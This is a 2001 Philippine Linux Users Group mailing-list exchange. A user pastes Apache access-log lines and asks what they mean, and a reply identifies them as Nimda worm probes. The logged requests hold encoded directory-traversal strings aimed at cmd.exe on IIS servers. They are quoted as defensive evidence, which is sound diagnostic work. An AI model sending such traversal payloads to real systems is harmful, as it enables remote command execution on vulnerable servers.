It's the NIMDA worm. The infected host is 210.106.73.5. -----Original Message----- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] Sent: Wednesday, November 21, 2001 8:41 AM To: [EMAIL PROTECTED] Subject: [plug] Apache access log
Hi, I did tail -f /etc/httpd/logs/access_log to our Apache web server. Here is the output. 210.106.73.5 - - [21/Nov/2001:07:56:31 +0800] "GET /msadc/..%255c../..%255c../.. %255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 338 210.106.73.5 - - [21/Nov/2001:07:56:31 +0800] "GET /scripts/..%c1%1c../winnt/sys tem32/cmd.exe?/c+dir HTTP/1.0" 404 304 What's does "/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304" mean? - Roi Angeles Communications - Mark 8:36 For what shall it profit a man, if he shall gain the whole world, and lose his own soul? _ Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph To leave: send "unsubscribe" in the body to [EMAIL PROTECTED] To subscribe to the Linux Newbies' List: send "subscribe" in the body to [EMAIL PROTECTED] _ Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph To leave: send "unsubscribe" in the body to [EMAIL PROTECTED] To subscribe to the Linux Newbies' List: send "subscribe" in the body to [EMAIL PROTECTED]
